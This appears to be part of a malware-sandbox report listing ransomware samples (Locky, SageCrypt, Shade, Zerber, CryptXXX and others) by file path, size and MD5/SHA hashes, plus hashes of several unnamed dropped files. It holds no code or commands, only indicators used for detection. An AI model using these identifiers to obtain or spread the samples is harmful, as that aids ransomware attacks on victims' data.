SHA1e5e4c3e62ce10ecf0bfbf72759acf2ebb0767909
SHA256826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add
SHA512787114ea5b730b96d2b83ca17cb16cc4047dd118402b2cf87c7092b4c7b3be4a73aac5633d1d2fef2a1479c4e05afaded05168f7cdecee008cbc11de46e63d3a
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe
Filesize64KB
MD5f5ab14add25b584c072ad6ae3b8d70a5
SHA1f8edaf06f7a28f15ba143f1cf4e56c36b0584c7c
SHA25613f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8
SHA51237d56703092404eebf856d395db2781d1494b2f51d0a1336247020c9bd9e98970a52df6b3ac3e99611701bbc39b23fdb5134263dad188b69b6d31d87f6ae0480
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe
Filesize509KB
MD5e8a51079b1ee38d602f9ddbc051f48ec
SHA174126328ab58a7131b81d97797df9616dd0e61ef
SHA256ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399
SHA5123b2261e509cd4620cfaa95057ae4db50f0a931c5d9b104428ebaa5e000dce86d210d0ee74bb9e81adc4bf3dadae0e9545318e54601b809fbbcb71e12e1fdea16
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe
Filesize331KB
MD5ded0417b8acfec8b98f65f2fa0b9666c
SHA134ecd81db29d418d29aeb6fb7ca32d7bfd2f8c69
SHA256eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2
SHA5121cde6b4ae7595d90e7c3e833144b3e9ca5264b1d5fb5b85b4c7231d49426a55cf7b48c315398222af238de7856693be3a03980537707ec9e285db2f86d4c6014
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe
Filesize344KB
MD527591fda00d131fd0434fea3110c5e94
SHA1e80e027c68434514fa505ad5e56940d87fbefc2d
SHA25647b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853
SHA512cf16ffc65ca50b9aa901b6b0addd37b1963d03347bc8d52c37b7eb2d5eb89c294cdba58948a47046d819d828c042a5a5f6b5cf3707957a3c1e5d9ea6c883dfd4
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
Filesize290KB
MD522fbe79c88bce367f5b9aa0e246143d0
SHA1d8968daa20ffc47dff9d63d060f43aba384fa978
SHA256a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720
SHA512e983530d373c0015dc61116e7391d97d9d1366008a48f2fe957945220ec50a1a4fb4ba35b7db82654ae11b4dc3791e7fa5f5f9e8084489847e611c733780db55
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe
Filesize1.2MB
MD5348e8a18eedf7b730bed0b61665d7a7d
SHA1de5ab8a4349c0a3239f16cf398edc6e37adea6d7
SHA256c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978
SHA512d3efeea1b171445593eb505b85cda2dc7241c47e85c04a7fea6e4ea3904c1fa568e9d35686c77c8f680d64cbc565eb0a97f21d2795da71811b4f0d5457954b0c
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe
Filesize396KB
MD5604a494bc87e57e500763405c457ab37
SHA18780c04e80a092ee32ffdfe395f9b330986a5c15
SHA256bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094
SHA51220451c4646e46717958fd37e17d7e4b3f57c263d23f6fcc03792a0e6bf6e4faa1b20f4b45ed4bfa4fc35b92bd3fad9b649d3c4ddd6d0bc7d0183d64b16095fc9
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe
Filesize488KB
MD549fa73ac4c6ab1b541f0127885de2604
SHA179e28bb0c6677851db45638bed3933d4d95bd8ee
SHA25628ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a
SHA5123b55ed169ed415b3e8f666f1189f82917c1632d23c51b19bd1b3f58faf68f5562ea31d3ca22b8abb637800968aebe92a53dbe68b5b5c418e37c01f97a8a5f807
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe
Filesize297KB
MD510def2d879fea8dee2595d9869372e79
SHA10276dfc536aeff37e3751d3834279c59ab216b36
SHA2564a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82
SHA512f8cb184818716e5755f1556b6e39d461d46bffdb690af2222cab129caef4a5d67847dd622af226a2ee81004355a9a8653c7dfb0145778b85b65237d5bd69a661
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe
Filesize316KB
MD5b83b041b8197ee54282146fdac844828
SHA146f212484a6d2e397fe4fa3b4a71d1749245996b
SHA256162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84
SHA5123c4a29a78d4865f7a2e24c9c0c5ee2a3f310ff9e098b2a70ae92872493884ce1c67b774a908147d39939833b5b20b9c887b187cfceefc74b64173bfb27db6bd4
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exe
Filesize304KB
MD5770586df7c724b4432441c4183522348
SHA167712a2ef30b0629a7251b01b97c16406454a548
SHA2567f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de
SHA512cf739af81d6a52c17f89220ae9dcebe91d5ad47776398b554b5f5ff08c145889a90b13d33dd41c464c71b4cdaf2c1e34dde2a9b415c4883fcdfcbdbed367d7ff
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe
Filesize286KB
MD57bb0abdb45d40ff998fa30e2e9486b0e
SHA16b7be900951a0251e7d98c9f0f336e32f1e3b757
SHA256943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0
SHA512e1e8c8a36f06cd2fd835f99153d69c5cd2f73e502c2131ae8b9c7de083d6a1afebb6726bdaf0158fede27851f014391c09096af558c1fa55aed3dee50eadbb05
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe
Filesize299KB
MD59965924377cf4958853abdeb52acdf1a
SHA1c8f83653a0b7f3688d4169e757e203da69af468a
SHA2562bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3
SHA5125fbeaa93048ae59096cf182ba66cea836932c0d1dae7c51c3e506405964dcdb52c8f2f25da6fe111d0a18e5de50a328786e93a54700c8c5bd6d7aedb98ff66d2
-
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe
Filesize115KB
MD54d0f490e3e21bef1c6f0c6fa93de90ed
SHA1877a9e6039e617a38faf51681ed8956dbca55f24
SHA25607ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa
SHA512e34c908be98f4633cf8a89f2af21551fc157f44cc333459957aa4267e503e32279a0723a47058814f941231e312426780a1d4af3ea5a57e947eed6bceb4e50d1
-
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe
Filesize558KB
MD5b7a1346952d1f410c33b1b8a872827ca
SHA14c1f7d459cd2f2c502aab6b048866754c9597950
SHA2563d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022
SHA512713354aa1f24400d65612b4ac0b0b3ce3a3a52cb262103fd1295f9321ae2ef66e3b8b1fbfee785ab3df7bf9b03ea4efac97b8366681d59bffa6322bb52b026f5
-
C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe
Filesize250KB
MD545f4aaffbf64d479b41e00409f1cae73
SHA1a79e17b709a06d36a285849e8099fe7b71b7b3af
SHA25650f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17
SHA512da8d2278d41287e0b99ac3940a8a722870abcc875639cb15a49f94ee6eea6e911047422be52d1f4cdd8629f239175d41f4416f87c93d66c9500e66b5cd484fc3
-
Filesize
135B
MD56bab4edb7e32eeb33bcd17483636e8c2
SHA139bd9b42bdfe6837760e9a4788cc3105cd7a7e07
SHA256c0a4a5610b9ba448853c36e6549d1fc21b2dffbd6dc8517bf89a3f05dca805d2
SHA512f8c0617e3906a140006f8e1d3ef133bf97384b5f7baa5930d15c6b0b3f664e88eae437bfdae8649e6d808d86ae1b0fe4f66d5a259e8b6fd917ab8f6d1b9ff547
-
Filesize
5KB
MD54a5162d66bb70a6b33f1c1a4e043f820
SHA103f23f8d114f147f1b9c1086413b11be816426d4
SHA256dd66796d59ece247a3d10b61a1b41794c67d69528584f9bd3a221dab7d28f2f9
SHA5124298dcbcdd48658fdf11703ee53bd921df8cfe1933a447accf6092235fc4c4ac01ba67973cc93277de21c33d1e2b34c7f631bca3a14f502e674d17c54b3f42c4
-
Filesize
99KB
MD50aa620f27cf9fb7d1174461b12834cc3
SHA1d5d2b1aa10775df4d547f5a37f8bb3b88694a765
SHA256a3cc0dfb17be2303e801272325746b56d45736e57fa93b0cd074baa141661d32
SHA5126712b6ea23ff695b96acf75b5db2dd39582686f9d05a9435e421e17d15392455de4cb88e95e329cbf15345012217f2fb390b473f04c892e16ad68f48d23f0d96
-
Filesize
11KB
MD5a436db0c473a087eb61ff5c53c34ba27
SHA165ea67e424e75f5065132b539c8b2eda88aa0506
SHA25675ed40311875312617d6711baed0be29fcaee71031ca27a8d308a72b15a51e49
SHA512908f46a855480af6eacb2fb64de0e60b1e04bbb10b23992e2cf38a4cbebdcd7d3928c4c022d7ad9f7479265a8f426b93eef580afec95570e654c360d62f5e08d